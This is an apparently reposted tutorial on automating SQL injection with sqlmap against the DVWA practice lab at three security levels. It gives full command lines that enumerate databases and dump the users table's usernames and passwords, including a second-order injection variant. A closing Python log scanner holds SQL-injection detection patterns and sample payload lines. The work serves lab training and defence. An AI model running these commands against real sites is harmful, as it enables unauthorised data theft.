
Sample analysis of Sqlmap automated injection

WBOY
2023-05-13 15:31:13

Using sqlmap to automate injection against DVWA
Set the DVWA security level to low

  1. Open the SQL Injection page of DVWA (SQL Injection (Blind)), open the browser's debugging tools, enter a user ID and submit it, then look at the intercepted request.

  2. You can see that it is a GET request with the URL "http://192.168.1.222:8089/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"

  3. Let's put it straight into sqlmap to test, using the -u option: -u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#"

  4. You can see that a login is required here; without it the test cannot proceed. So we need to add a cookie to maintain the login session.

6. Use the Burp Suite proxy to capture the traffic and obtain the login cookie, then add --dbs to enumerate the databases: -u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" --dbs

You can see that the database revealed is mysql.

7. Use -D xxx to specify the database to inspect and --tables to list all tables in that database: -u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa --tables

View the running results:

8. Use -D xxx -T ttt to specify the table to inspect and --columns to list the columns of that table:

-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T users --columns

9. Use -D xxx to specify the database, -T xxx to specify the table and -C xxx to specify the columns, then --dump to view the column data:

-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T users -C password,user --dump

  • Adjust the DVWA security level to medium, save the captured request as a .txt file and put it in the sqlmap directory, then run sqlmap directly with -r file name --dbs (you can add the subsequent parameters yourself).


  • Adjust the DVWA security level to high. Because the page that submits the data this time is not the same page as the one that returns the results, the previous method cannot be used here; use the second-order injection method instead.

  • The URL to submit data

  • Returned URL

Save the captured request as a .txt file and put it in the sqlmap directory. Next, enumerate the databases with the command: -r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" --batch --level 2 --dbs


-r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" --batch --level 2 -D dvwa --tables

-r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" --batch --level 2 -D dvwa -T users --columns

Dump the field data

-r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" --batch --level 2 -D dvwa -T users -C user,password --dump

Some concepts:

Second-order injection (second-order)
  • SQL injection --second-order: sometimes the data entered at the injection point is returned not on the current page but on another page. In that case you need to specify which page the response should be read from in order to judge true or false. --second-url is followed by the URL of the page that returns the result.


  • --batch: accept the default answers automatically, with no need to manually type yes or no
  • level: sqlmap has 5 detection levels in total, and the default is 1. The higher the level, the more payloads are used during detection; level 5 uses the most payloads and also automatically tests headers such as Cookie and XFF for injection. Of course, the higher the level, the slower the detection. This parameter also affects which injection points are tested: GET and POST data are tested, the HTTP Cookie is tested when level is 2, and the HTTP User-Agent/Referer headers are tested when level is 3. When you are not sure which parameter is the injection point, it is recommended to set level to 5 to ensure accuracy (detection will also be slower).
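
On the defending side, the requests sent in the steps above leave traces in the web server's access log, and the header testing described under level means the Referer and User-Agent fields need inspecting as well as the id parameter. The following is an added example, not part of the original article; the Combined Log Format, the token list and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Combined Log Format: ip - - [time] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
# Heuristic SQL-injection tokens (this list is an assumption of the example).
SQLI_RE = re.compile(
    r"\bunion\b.+\bselect\b|\b(?:and|or)\s+\d+\s*=\s*\d+|\bsleep\s*\("
    r"|\bbenchmark\s*\(|information_schema|\border\s+by\s+\d+", re.IGNORECASE)

def inspect_line(line):
    """Return (ip, reasons) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    reasons = []
    if "sqlmap/" in m["ua"].lower():  # default UA; trivially changed by the client
        reasons.append("sqlmap default User-Agent")
    # GET parameters: parse_qsl percent-decodes, so encoded payloads are seen.
    for name, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        if SQLI_RE.search(value):
            reasons.append(f"SQL tokens in parameter {name!r}")
    # Referer and User-Agent: the headers the article says are tested at level 3.
    for field in ("referer", "ua"):
        if SQLI_RE.search(unquote_plus(m[field])):
            reasons.append(f"SQL tokens in {field}")
    return m["ip"], reasons

def scan(lines):
    """Map client IP -> sorted list of distinct reasons, flagged lines only."""
    hits = {}
    for ip, reasons in filter(None, map(inspect_line, lines)):
        if reasons:
            hits.setdefault(ip, set()).update(reasons)
    return {ip: sorted(r) for ip, r in hits.items()}

# Constructed sample lines (not real traffic) for the DVWA path used above.
SAMPLE = [
    '192.168.1.50 - - [13/May/2023:15:00:01 +0800] "GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 1540 "-" "Mozilla/5.0"',
    '192.168.1.77 - - [13/May/2023:15:00:05 +0800] "GET /vulnerabilities/sqli/?id=1%20AND%205230%3D5230&Submit=Submit HTTP/1.1" 200 1540 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '192.168.1.88 - - [13/May/2023:15:00:09 +0800] "GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 1540 "http://192.168.1.222:8089/vulnerabilities/sqli/ AND SLEEP(5)" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, why in scan(SAMPLE).items():
        print(ip, why)
```

Cookie values, which the article says are tested when level is 2, are not recorded in the Combined Log Format, so covering them requires a log format that includes the Cookie header.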


Statement:
This article is reproduced from yisu.com. If there is any infringement, please contact admin@php.cn to have it deleted.